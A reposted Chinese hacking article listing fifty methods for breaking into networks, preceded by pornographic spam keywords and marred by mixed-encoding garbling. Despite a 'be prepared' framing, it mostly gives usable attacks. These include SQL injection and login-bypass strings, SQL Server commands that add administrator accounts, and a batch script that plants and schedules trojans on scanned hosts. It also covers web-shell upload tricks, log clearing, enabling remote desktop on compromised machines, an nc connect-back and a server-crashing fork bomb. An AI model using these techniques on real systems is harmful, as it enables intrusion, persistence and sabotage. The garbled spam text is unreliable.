欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

黑客入侵網(wǎng)絡(luò)的五十種方法

互聯(lián)網(wǎng)   發(fā)布時間:2008-10-08 21:29:41   作者:佚名   我要評論
現(xiàn)在網(wǎng)上的攻擊事件越來越多,黑客都是通過什么方法來攻擊我們的呢?下面我們給大家總結(jié)了黑客入侵網(wǎng)絡(luò)的五十種方法,讓大家做到有備無患。   1.網(wǎng)寬網(wǎng)絡(luò)有限公司制作的網(wǎng)站基本都有注入漏洞 搜索網(wǎng)寬網(wǎng)絡(luò)   2.搜索欄里輸入   關(guān)鍵字%'and 1=1 and '%'='
現(xiàn)在網(wǎng)上的攻擊事件越來越多,黑客都是通過什么方法來攻擊我們的呢?下面我們給大家總結(jié)了黑客入侵網(wǎng)絡(luò)的五十種方法,讓大家做到有備無患。
  1.網(wǎng)寬網(wǎng)絡(luò)有限公司制作的網(wǎng)站基本都有注入漏洞 搜索網(wǎng)寬網(wǎng)絡(luò)   2.搜索欄里輸入   關(guān)鍵字%'and 1=1 and '%'='   關(guān)鍵字%'and 1=2 and '%'='   比較不同處 可以作為注入的特征字符   3.登陸框用戶名和密碼輸入'or'='or' 漏洞很老但是現(xiàn)在很是遍地都是   4.我們先到www.google.com底下搜索一下co net mib ver 1.0   密碼帳號都是 'or'='or'   5.掛馬代碼   6.http://www.wyyfk.com/24小時掛qq工具   7.開啟regedt32的sam的管理員權(quán)限 檢查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理員和guest的f鍵值,如果一樣就是用被入侵過了,然后刪了guest帳號,對方可以用guest帳號使用administraeors的權(quán)限,你也可以用這方法留住肉雞,這方法是簡單克隆,   net localgroup administrators還是可以看出guest是管理員來   7.只要敢想,新浪也可入侵 注入點   http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59   微軟官方網(wǎng)站注入點   http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=   8.ms05016攻擊工具用法 mshta.exe test.hta 文件名.后綴名 可以綁上qq大盜木馬   9.有sa權(quán)限sqlserver數(shù)據(jù)庫、并且能sql注入支持fso asp的服務(wù)器   sql注入后,如何上傳木馬,   文章地址 http://hack123.home4u.china.com/0601.htm   10.qq強制聊天代碼   http://wpa.qq.com/msgrd?v=1&uin=對方的qq號&site=ioshenmue&menu=yes   使用方法:把代碼中的紅色的“********”星號換成你想與其聊天的qq號后復(fù) 制到瀏覽器的地址欄處即可。無論他是否你的好友,你無須加他為好友就能給 他發(fā)qq消息。   11. mybbs論壇cookie欺騙 后臺備份馬   12.軟件instsrv.exe 把.exe文件做成系統(tǒng)服務(wù)來啟動 用來肉雞掛qq等   用法: 安裝: instsrv.exe 服務(wù)名稱 路徑   卸載: instsrv.exe 服務(wù)名稱 remove   13.以動網(wǎng)為例數(shù)據(jù)庫查找dv_log,在上面的查詢的字段名里選l_content后面的關(guān)鍵字填上password2,找到的username2=風(fēng)の白衣&password2=01180017&username1=風(fēng)の白衣&submit=添 加 password2=01180017就是他的登陸密碼   14.搜索的技巧 inurl:網(wǎng)址   15.啟航工作室wms 5.0網(wǎng)站程序漏洞   在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)   利用動畫看http://soft.77169.com/62/20050530/6824.html   16.很多網(wǎng)站程序(比如華碩中文官方網(wǎng)站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測,也就是說,他會檢測文件是不是有.jpg,那么我們要是把文件改成:ating.jpg.asp試試。。由于還是asp結(jié)尾,所以木馬不會變~   17.天意商務(wù)系統(tǒng)網(wǎng)上依然有 有漏洞 網(wǎng)站具體的樣式http://www.wzgcc.org/   工具下載www.hack6.com   地址欄里,填上天意商務(wù)系統(tǒng)的網(wǎng)址就可以了,注意一定要是主頁面   18.sql注入時工具---internet選項---高級里找到顯示友好的錯誤信息勾去掉   不能注入時要第一時間想到\暴庫   19.這個dbinbd.asp文件插入后門的功能適用于文件名為.asp的所有access數(shù)據(jù)庫不是動網(wǎng)論壇也一樣可以使用的,后門隱蔽,幾乎發(fā)現(xiàn)不了   工具使用方法動畫和所有文件   http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811   20.缺少xp_cmdshell時   嘗試恢復(fù)exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'   假如恢復(fù)不成功,可以嘗試直接加用戶(針對開3389的)   declare @o int   exec sp_oacreate 'wscript.shell',@o out   exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理員
21.批量種植木馬.bat   for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$ 復(fù)制木馬到掃描的計算機當(dāng)中   for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行木馬的時間   掃描地址.txt里每個主機名一行 用\\開頭   22.搜索 powered by discuz!4.0.0rc3 開放頭像的可利用 工具地址www.hack6.com   23.dv7.1用還原數(shù)據(jù)功能 還原asa木馬   24.凡人網(wǎng)絡(luò)購物系統(tǒng)v6.0 可以\暴庫   25.ipb2.0.2漏洞 構(gòu)造語句   $qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理員密碼 想看動畫到黑基里找 ipb<= 2.0.3論壇注入工具 www.hack6.com有下載   26. 將工具傳到郵箱 在下載上右擊 復(fù)制快捷方式 擁有自己了的下載空間   27.北京沖qb要寬帶號跟綁定寬帶的后4位電話,當(dāng)你掃出北京款待號的密碼必須是8位的密碼,而且開頭是6或8的才可以,因為北京的電話都是6根8開頭的而且都是8位的,北京的區(qū)名海淀 東城 西城 門頭溝 豐臺 潮陽 宣武 通州 昌平,去http://cnc.qq.com/bbn/沖   28.搜索 企業(yè)網(wǎng)絡(luò)辦公系統(tǒng) 添'or''=' 登陸 在個人郵箱 上傳asp木馬   29.本人原創(chuàng) 搜索"一點點星空驛站 留言本" 默認數(shù)據(jù)庫是gbmdb.mdb 很多網(wǎng)站用這個留言本 但是用搜索引擎搜不到 可以給大家在入寢時多個思路   30.在程序上傳shell過程中,程序不允許包含標記符號的內(nèi)容的文件上傳,比如藍屏最小 的asp木馬,我們來把他的標簽換一下: 保存為.asp,程序照樣 執(zhí)行.   31.目錄權(quán)限設(shè)置變態(tài)的話可以用一些方法(比如serv-u溢出)將此web用戶提權(quán) 可訪問全站目錄掛馬   32.喜歡網(wǎng)頁掛馬的看看這篇總結(jié)文章吧   http://77169.com/news/hk/2005060611656.html   33.搜索"images/admin" 或".tw/images/admin" 可以找到些臺灣的數(shù)據(jù)庫   34.iis6 for windows 2003 enterprise edition 如iis發(fā)布目錄文件夾包含.asp后輟名.   將.asp后輟改為.jpg或其它的如.htm,也可以運行asp,但要在.asp文件夾下.   .cer 等后綴的文件夾下都可以運行任何后綴的asp木馬   35.telnet一臺交換機 然后在telnet控制主機 控制主機留下的是交換機的ip   然后用#clear logg和#clear line vty *刪除日志   36.搜索關(guān)鍵字:"copyright 2003-2004 動易網(wǎng)絡(luò)" 后面地址改成upfile_soft.asp 這樣的漏洞很多   37.bbsxp的漏洞總結(jié) powered by bbsxp 5.15/licence blog.asp中的對id 的過濾不嚴的漏洞 拿到管理員的前后臺密碼 工具:bbsxp完全版 cookies 欺騙 bbsxp 過濾了 asp 文件的上傳 所以我們這里用 asa 來傳馬   38.學(xué)會總結(jié)入侵思路http://www.77169.com/news/hk/2005060811688.html   39.電腦壞了省去重新安裝系統(tǒng)的方法   純dos下執(zhí)行,   xp:copy c:\windows\repair\*.* 到 c:\windows\system32\config   2k: copy c:\winnt\repair\*.* 到 c:\winnt\system32\config   40.一般人設(shè)置啊拉qq大盜的時候發(fā)信和收信都是同一個信箱,因此當(dāng)我的機子中了此木馬后沒有立即殺掉進程,而是用內(nèi)存編輯工具打開它的進程,查找smtp字樣,就會找到它的信箱和密碼了。只對1.5以前的管用.   41.內(nèi)網(wǎng)控制內(nèi)網(wǎng) 用vidc 還要有一只肉雞 動畫看黑基的   http://soft.77169.com/62/20050608/6878.html   42.有許多管理員用備份的日期做備份數(shù)據(jù)庫的名字   比如http://www.hack6.com/bbs/databackup/20050601.mdb   43.動網(wǎng)數(shù)據(jù)庫oldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&submit=更 新   不知道用戶名(不是葛防) 轉(zhuǎn)化這個用他本身的頁面   http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=填寫登錄信息   填寫登錄信息這句話意思是“填寫登錄信息”   那么就把填寫登錄信息換成叼防 可以看到用戶名   44.對付信息監(jiān)控系統(tǒng) 木馬必須是加密的 如net user用不了就用net1 user等等 我是大連的 大連這邊主機用這方法好用 可以直接傳加密的馬 用用黑基tyrant的方法 上傳一個cmd的aspshall 用nc連接自己的nc監(jiān)聽端口 在web目錄下寫個加ftp用戶的txt 本地43958用nc提交 ftp到服務(wù)器加用戶
45.解決tcp/ip篩選 在注冊表里有三處,分別是:   hkey_local_machine\system\controlset001\services\tcpip   hkey_local_machine\system\controlset002\services\tcpip   hkey_local_machine\system\currentcontrolset\services\tcpip   分別用   regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip   regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip   regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip   命令來導(dǎo)出注冊表項   然后把三個文件里的enablesecurityfilters"=dword:00000001,   改成enablesecurityfilters"=dword:00000000 再將以上三個文件分別用   regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 導(dǎo)入注冊表即可   46.使chm木馬無法在本地運行木馬程序 將注冊表"hkey_current_u   ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004項的值由原來十進制的0改為十六進制的3。   47.開3389的5種方法   (1)打開記事本,編輯內(nèi)容如下:   echo [components] > c:\sql   echo tsenable = on >> c:\sql   sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q   編輯好后存為bat文件,上傳至肉雞,執(zhí)行。   (2) (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05   下載地址:www.netsill.com/rots.zip   在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調(diào)用腳本,例如:   c:\>cscript rots.vbs <目標ip> <用戶名> <密碼> [服務(wù)端口] [/r]   如果要對本地使用,ip地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用 ""表示)。   (3)djshao正式版5.0   解壓djshao5.0.zip,用你的隨便什么方法把把解壓出來的djxyx*.**e上傳到肉雞的c:\winnt\temp下,然后 進入c:\winnt\temp目錄執(zhí)行djxyx*.**e解壓縮文件,然后再執(zhí)行解壓縮出來的azzd.exe文件,等一會肉雞 會自動重啟!重啟后會出現(xiàn)終端服務(wù)   (4)下載dameware nt utilities 3.66.0.0 注冊版   地址www.netsill.com/dwmrcw36600.zip   安裝注冊完畢后輸入對方ip用戶名密碼,等待出現(xiàn)是否安裝的對話框點是。   復(fù)制啟動后出現(xiàn)對方桌面。   在對方桌面進入控制面版,點添加或刪除程序。進入后點添加/刪除windows組件,找到終端服務(wù),點際進入 后在啟動終端服務(wù)上打上勾。確定自動提示重起,重起后ok   (5)大家最常用的 3389.exe 下載地址www.hack6.com 把程序上傳到肉雞運行后重啟既可   48.qq上得到別人的ip   一般跟別人聊天 如果是對方先對你說話 那么她的ip顯示出來的概率就大   當(dāng)然如果是我們找對方 可以先跟她說發(fā)過去消息之后 然后關(guān)閉窗口等待她的回復(fù)   還可以用天網(wǎng)防火墻選擇上udp數(shù)據(jù)保檢測,即可攔截到對方ip   49.掛馬js代碼document.write('');保存到j(luò)s頁面里 可讓所有頁面掛馬   50.讓服務(wù)器重啟   寫個bat死循環(huán):   @echo off   :loop1   cls   start cmd.exe   goto loop1 保存成bat guset權(quán)限就可以運行 運行后很快服務(wù)器就會死機 管理員自然會去重啟

相關(guān)文章

最新評論